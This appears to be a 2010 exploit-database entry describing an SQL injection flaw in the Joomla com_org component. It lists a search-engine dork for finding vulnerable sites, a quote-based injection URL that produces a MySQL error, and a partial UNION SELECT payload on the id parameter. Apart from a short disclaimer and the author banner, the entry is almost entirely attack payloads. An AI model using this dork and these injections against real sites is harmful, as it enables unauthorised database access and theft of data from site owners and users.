Joomla Component com_org SQL Injection Vulnerability
SEBUG-ID:19270
SEBUG-Appdir:Joomla
Published:2010-03-14
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
###############################################################################
## ##
## Joomla com_org SQL Injection Vulnerability ##
## ##
###############################################################################
\\\\\\\\\\\\\\\\\\\\\\\\\\\N2n-Hacker - 2nd@live.fr////////////////////////////
*******************************************************************************
=> Dork = inurl:"option=com_org"
-------------------------------------------------------------------------------
# EXp : http://www.website.com/path/index.php?option=com_org&task=info&id=22' <=[SQLI] --&lang=en
Error = "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version"
# http://www.website.com/path/index.php?option=com_org&task=info&id=-22 UNION SELECT 1,2 ..... --&lang=en
********************************************************************************
\\\\\\\\\\\\\\\\\\ BAD LIFE //////////////////
********************************************************************************// sebug.net [2010-03-14]